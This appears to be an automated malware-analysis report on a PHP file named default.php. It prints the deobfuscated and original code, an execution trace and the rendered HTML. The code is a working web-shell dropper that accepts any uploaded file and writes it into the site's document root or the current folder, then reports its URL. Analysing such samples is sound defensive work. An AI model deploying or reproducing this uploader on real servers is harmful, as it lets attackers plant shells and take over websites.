PHP Malware Analysis
default.php
md5: d7cd8b57f141e573fb83d1dc2e4fc59a
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<meta name="theme-color" content="black">
<style>
*{
background-color: #000000;
color: #fff;
text-align: center;
}
form input {
background: black;
border: 1px solid #54FE55;
padding: .5rem;
color: #54FE55;
text-shadow: 0px 0px 10px #54FE55;
box-shadow: 0px 0px 5px #54FE55;
}
form input:focus {
outline: none;
}
form button {
background: #1a4f1a;
color: #54FE55;
border: 0;
text-shadow: 0px 0px 10px #54FE55;
box-shadow: 0px 0px 10px #1a4f1a;
cursor: pointer;
}
form button:focus {
outline: none;
}</style>
<table width="100%" height="80%">
<td>
<?php
echo "<small><<em>/0399obot</em>></small>";
echo "<form method='post' enctype='multipart/form-data'>\n\t <input type='file' name='idx_file'>\n\t <input type='submit' name='upload' value='upload'>\n\t </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
if (is_writable($root)) {
if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://" . $_SERVER['HTTP_HOST'] . "/";
echo "<a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Shell: <b>{$files}</b> di folder ini";
} else {
echo "gagal upload >:(";
}
}
}Execution traces
data/traces/d7cd8b57f141e573fb83d1dc2e4fc59a_trace-1676247328.2972.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:15:54.195023]
1 0 1 0.000140 393528
1 3 0 0.000216 399392 {main} 1 /var/www/html/uploads/default.php 0 0
1 A /var/www/html/uploads/default.php 39 $root = '/var/www/html'
1 A /var/www/html/uploads/default.php 40 $files = NULL
1 A /var/www/html/uploads/default.php 41 $dest = '/var/www/html/'
1 3 1 0.000286 399432
0.000312 314376
TRACE END [2023-02-12 22:15:54.195223]
Generated HTML code
<html><head><meta name="theme-color" content="black">
<style>
*{
background-color: #000000;
color: #fff;
text-align: center;
}
form input {
background: black;
border: 1px solid #54FE55;
padding: .5rem;
color: #54FE55;
text-shadow: 0px 0px 10px #54FE55;
box-shadow: 0px 0px 5px #54FE55;
}
form input:focus {
outline: none;
}
form button {
background: #1a4f1a;
color: #54FE55;
border: 0;
text-shadow: 0px 0px 10px #54FE55;
box-shadow: 0px 0px 10px #1a4f1a;
cursor: pointer;
}
form button:focus {
outline: none;
}</style>
</head><body><table width="100%" height="80%">
<tbody><tr><td>
<small><<em>/0399obot</em>></small><form method="post" enctype="multipart/form-data">
<input type="file" name="idx_file">
<input type="submit" name="upload" value="upload">
</form></td></tr></tbody></table></body></html>Original PHP code
<meta name="theme-color" content="black">
<style>
*{
background-color: #000000;
color: #fff;
text-align: center;
}
form input {
background: black;
border: 1px solid #54FE55;
padding: .5rem;
color: #54FE55;
text-shadow: 0px 0px 10px #54FE55;
box-shadow: 0px 0px 5px #54FE55;
}
form input:focus {
outline: none;
}
form button {
background: #1a4f1a;
color: #54FE55;
border: 0;
text-shadow: 0px 0px 10px #54FE55;
box-shadow: 0px 0px 10px #1a4f1a;
cursor: pointer;
}
form button:focus {
outline: none;
}</style>
<table width="100%" height="80%">
<td>
<?php
echo "<small><<em>/0399obot</em>></small>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "<a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Shell: <b>$files</b> di folder ini";
} else {
echo "gagal upload >:(";
}
}
}
?>